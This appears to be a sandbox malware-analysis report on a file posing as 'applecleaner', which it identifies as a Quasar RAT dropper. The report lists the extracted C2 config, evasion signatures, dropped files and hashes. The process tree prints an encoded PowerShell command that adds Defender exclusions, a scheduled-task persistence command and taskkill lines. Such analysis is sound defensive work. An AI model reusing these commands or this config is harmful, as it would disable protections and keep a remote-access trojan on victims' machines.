Overview

overview

10

Static

static

3

applecleaner (1).exe

windows10-2004-x64

10

applecleaner (1).exe

windows10-ltsc 2021-x64

10

applecleaner (1).exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    594s
  • max time network
    599s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-01-2025 23:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    applecleaner (1).exe

  • Size

    6.7MB

  • MD5

    cad8354da177706b2d48dd9d0642d9f0

  • SHA1

    ea69a1e3cf00894543bb40f5ee4251439e3b2252

  • SHA256

    62fc499b88eeb0334509ede6bba0f67dcdce5eb7954e5cbd2adfaabc0e2d405e

  • SHA512

    f9dc85730ee4e729358a9acf3d5ace4aa146f16736dd368308c2feb4ee876d0a60b586907aa556ea357459eeb2c678451667ae4bb5dee3e94c2ca39719945f78

  • SSDEEP

    196608:3pm+PJQbtnYGscd8rQcDw9Le+3L+cES9SDI:3pm2MnYG96jR+3LM

Score
10/10
quasarretiggadefense_evasiondiscoveryevasionspywarethemidatrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

retigga

C2

192.168.1.90:4782

Mutex

a44d3f31-890a-4898-b165-c2376c429bdc

Attributes
  • encryption_key

    44D22D01383E73D0D2E9F33669A5C563ECE6903D

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Themida packer 7 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Kills process with taskkill 3 IoCs
    evasion
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\applecleaner (1).exe
    "C:\Users\Admin\AppData\Local\Temp\applecleaner (1).exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4640
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAbABmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAaABuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAbgBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHAAdwBoACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3864
    • C:\Users\Admin\AppData\Local\Temp\applecleaner.exe
      "C:\Users\Admin\AppData\Local\Temp\applecleaner.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:3104
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1148
        • C:\Windows\system32\taskkill.exe
          taskkill /f /im EpicGamesLauncher.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4384
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2588
        • C:\Windows\system32\taskkill.exe
          taskkill /f /im FortniteClient-Win64-Shipping.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:5028
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c taskkill /f /im Battle.net.exe >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:808
        • C:\Windows\system32\taskkill.exe
          taskkill /f /im Battle.net.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3600
    • C:\Users\Admin\AppData\Local\Temp\Client-built.exe
      "C:\Users\Admin\AppData\Local\Temp\Client-built.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2272
      • C:\Windows\SYSTEM32\schtasks.exe
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:516
      • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2960
        • C:\Windows\SYSTEM32\schtasks.exe
          "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:4012

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Client-built.exe
    Filesize

    3.1MB

    MD5

    6453142cfb0e786c06e25d3e844e09b6

    SHA1

    9262b0721295b5b7467d81f8ca4ce49d402b3a6d

    SHA256

    f6a894441fc6b6fee1bc6dcce6515da3f113abe89ff69fba219795887c2a8e8e

    SHA512

    06168bd38aea958a1c929e7660c09c62eae713af29e2967b728d8e29244798294b830f2392cc4ff32665e4c3112e9de2cfb0db73dca537b717521f76f03cbd1e

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hcbomvqk.ewc.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\applecleaner.exe
    Filesize

    3.6MB

    MD5

    22dd2356db64b549a2b3b6acde0c0c38

    SHA1

    e6a313207fe182486c495bbfd22d1c39037528e5

    SHA256

    4fc5a913380bc5b9e54b38fcf5735272aa84b74108d6b949bbedf39ae2789233

    SHA512

    2208d5b7f903967883dba234caa45422a1df48dc0b6b4ce9eae172b1dd8f8ac7ecf2a150f70f2eb95971bbbd099f343f184cb4785befcf793617dd2722fe417b

    Download Submit

  • memory/2272-26-0x0000000000990000-0x0000000000CB4000-memory.dmp

    Filesize

    3.1MB

    Download

  • memory/2272-21-0x00007FFCD54B3000-0x00007FFCD54B5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2960-69-0x000000001BF70000-0x000000001C022000-memory.dmp

    Filesize

    712KB

    Download

  • memory/2960-68-0x000000001B740000-0x000000001B790000-memory.dmp

    Filesize

    320KB

    Download

  • memory/3104-43-0x00007FF664CE0000-0x00007FF665673000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3104-42-0x00007FF664CE0000-0x00007FF665673000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3104-77-0x00007FF664CE0000-0x00007FF665673000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3104-9-0x00007FF664CE0000-0x00007FF665673000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3104-40-0x00007FF664CE0000-0x00007FF665673000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3104-41-0x00007FF664CE0000-0x00007FF665673000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3864-52-0x0000000070680000-0x00000000706CC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/3864-62-0x00000000069A0000-0x00000000069BE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/3864-30-0x0000000005E20000-0x0000000006174000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/3864-27-0x0000000005410000-0x0000000005432000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3864-29-0x0000000005DB0000-0x0000000005E16000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3864-20-0x0000000002E00000-0x0000000002E36000-memory.dmp

    Filesize

    216KB

    Download

  • memory/3864-47-0x0000000006470000-0x00000000064BC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/3864-46-0x00000000063E0000-0x00000000063FE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/3864-51-0x00000000069C0000-0x00000000069F2000-memory.dmp

    Filesize

    200KB

    Download

  • memory/3864-25-0x0000000005570000-0x0000000005B98000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/3864-63-0x00000000075B0000-0x0000000007653000-memory.dmp

    Filesize

    652KB

    Download

  • memory/3864-24-0x0000000002EE0000-0x0000000002EF0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3864-64-0x0000000007D50000-0x00000000083CA000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/3864-65-0x0000000007700000-0x000000000771A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/3864-66-0x0000000007780000-0x000000000778A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/3864-16-0x000000007350E000-0x000000007350F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3864-67-0x0000000007980000-0x0000000007A16000-memory.dmp

    Filesize

    600KB

    Download

  • memory/3864-28-0x0000000005C10000-0x0000000005C76000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3864-70-0x0000000007900000-0x0000000007911000-memory.dmp

    Filesize

    68KB

    Download

  • memory/3864-71-0x0000000007940000-0x000000000794E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/3864-72-0x0000000007950000-0x0000000007964000-memory.dmp

    Filesize

    80KB

    Download

  • memory/3864-73-0x0000000007A40000-0x0000000007A5A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/3864-74-0x0000000007A20000-0x0000000007A28000-memory.dmp

    Filesize

    32KB

    Download

  • memory/3864-22-0x0000000002EE0000-0x0000000002EF0000-memory.dmp

    Filesize

    64KB

    Download